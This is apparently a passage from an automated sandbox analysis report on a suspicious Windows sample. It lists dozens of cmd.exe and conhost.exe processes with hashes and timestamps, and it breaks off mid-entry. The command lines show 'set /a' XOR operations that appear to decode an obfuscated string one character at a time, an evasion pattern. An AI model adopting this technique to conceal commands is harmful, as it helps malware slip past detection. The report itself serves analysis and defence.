                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:40
                                                                                                                                                              Start time:09:41:05
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "216^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:41
                                                                                                                                                              Start time:09:41:05
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:42
                                                                                                                                                              Start time:09:41:05
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "221^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:43
                                                                                                                                                              Start time:09:41:05
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:44
                                                                                                                                                              Start time:09:41:05
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "212^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:45
                                                                                                                                                              Start time:09:41:05
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:46
                                                                                                                                                              Start time:09:41:05
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "240^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:47
                                                                                                                                                              Start time:09:41:05
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:48
                                                                                                                                                              Start time:09:41:06
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "153^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:49
                                                                                                                                                              Start time:09:41:06
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:50
                                                                                                                                                              Start time:09:41:06
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "220^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:51
                                                                                                                                                              Start time:09:41:06
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:52
                                                                                                                                                              Start time:09:41:06
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "145^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:53
                                                                                                                                                              Start time:09:41:06
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:54
                                                                                                                                                              Start time:09:41:06
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "195^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:55
                                                                                                                                                              Start time:09:41:06
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:56
                                                                                                                                                              Start time:09:41:06
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "133^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:57
                                                                                                                                                              Start time:09:41:06
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:58
                                                                                                                                                              Start time:09:41:06
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "145^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:59
                                                                                                                                                              Start time:09:41:06
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:60
                                                                                                                                                              Start time:09:41:06
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "157^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:61
                                                                                                                                                              Start time:09:41:06
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:62
                                                                                                                                                              Start time:09:41:06
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "145^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:63
                                                                                                                                                              Start time:09:41:06
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:64
                                                                                                                                                              Start time:09:41:06
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "216^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:65
                                                                                                                                                              Start time:09:41:06
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:66
                                                                                                                                                              Start time:09:41:07
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "145^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:67
                                                                                                                                                              Start time:09:41:07
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:69
                                                                                                                                                              Start time:09:41:07
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "129^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:70
                                                                                                                                                              Start time:09:41:07
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:71
                                                                                                                                                              Start time:09:41:07
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "201^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:72
                                                                                                                                                              Start time:09:41:07
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:73
                                                                                                                                                              Start time:09:41:07
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "137^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:74
                                                                                                                                                              Start time:09:41:07
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:75
                                                                                                                                                              Start time:09:41:07
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "129^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:76
                                                                                                                                                              Start time:09:41:07
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:77
                                                                                                                                                              Start time:09:41:07
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "129^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:78
                                                                                                                                                              Start time:09:41:07
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:79
                                                                                                                                                              Start time:09:41:07
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "129^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:80
                                                                                                                                                              Start time:09:41:07
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:0x7ff60f1e0000
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:81
                                                                                                                                                              Start time:09:41:07
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "129^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:82
                                                                                                                                                              Start time:09:41:07
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:83
                                                                                                                                                              Start time:09:41:08
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "129^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:84
                                                                                                                                                              Start time:09:41:08
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:85
                                                                                                                                                              Start time:09:41:08
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "129^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:86
                                                                                                                                                              Start time:09:41:08
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:87
                                                                                                                                                              Start time:09:41:08
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "129^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:88
